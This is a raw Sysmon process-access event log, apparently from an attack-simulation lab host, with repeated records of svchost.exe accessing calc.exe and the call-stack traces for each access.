22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361385Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361384Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361383Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361382Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361381Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361380Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361379Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.022{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361378Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361377Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361376Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361375Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361374Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361373Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361372Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361371Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361370Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361369Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361368Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361367Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361366Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361365Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361364Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 